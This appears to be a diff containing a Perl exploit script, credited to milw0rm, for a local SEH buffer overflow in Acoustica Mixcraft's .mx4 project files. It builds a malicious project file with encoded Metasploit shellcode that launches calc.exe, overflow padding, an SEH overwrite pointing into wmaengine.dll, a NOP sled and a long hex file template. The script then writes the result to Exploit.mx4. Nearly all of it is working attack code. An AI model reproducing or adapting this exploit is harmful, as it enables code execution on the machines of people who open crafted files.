-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x01\x00\x00\x46\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00".
-	"\x45\x66\x78\x4C";
-
-open (MYFILE, '>>Exploit.mx4');
-binmode(MYFILE);
-print MYFILE "$tuff";
-close (MYFILE);
-print "Exploit file has been created. ( Exploit.mx4 )\n";
-
-# milw0rm.com [2008-08-28]
+#!/usr/bin/perl
+#
+# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
+# Author: Koshi
+#
+# Date: 08-28-08 ( 0day )
+# Application: Acoustica Mixcraft
+# Version(s): (Possibly Older) / 4.1 Build 96 / 4.2 Build 98
+# Site: http://acoustica.com/mixcraft/download.htm
+# Tested On: Windows XP SP3 Fully Patched
+#
+# A vulnerability exists in an unchecked buffer located in the
+# project files (.mx4) for Acoustica Mixcraft4. The buffer should
+# contain the file name of an image located in 
+# "C:\Program Files\Acoustica Mixcraft 4\mixrez\icons" on a default
+# install of Mixcraft, and would be used as the icon for a specific
+# "track" or "instrument" in Mixcraft.
+# 
+# gr33tz: Rima my baby, str0ke, breaker_unit, mess', and my dude who
+# showed me this nifty program.
+#
+
+
+# win32_exec -  EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
+my $shellcode =
+"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
+"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
+"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
+"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
+"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
+"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
+"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
+"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
+"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
+"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
+"\xbd\x53\x64\xee\xc1";
+
+my $bof = "A"x324;
+my $sled = "\x90"x35;
+my $fill = "\x90"x468;
+my $buff = "".
+	"$bof".
+	"\xeb\x06\x90\x90". ### Pointer to next SEH record (Boing!)		    ###
+	"\x28\x12\x8b\x01". ### SE handler 0x018b1228 ( wmaengine.dll POP POP RET ) ###
+	"$sled".
+	"$shellcode".
+	"$fill";
+
+my $tuff = "".
+	"\x52\x49\x46\x46\xC4\x0F\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00".
+	"\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73".
+	"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C".
+	"\x4D\x79\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x52\x65\x63\x6F".
+	"\x72\x64\x69\x6E\x67\x73\x5C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54".
+	"\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00".
+	"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40".
+	"\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00".
+	"\x00\x00\xF0\x3F\x54\x72\x6B\x41\x98\x03\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
+	"\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"$buff".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
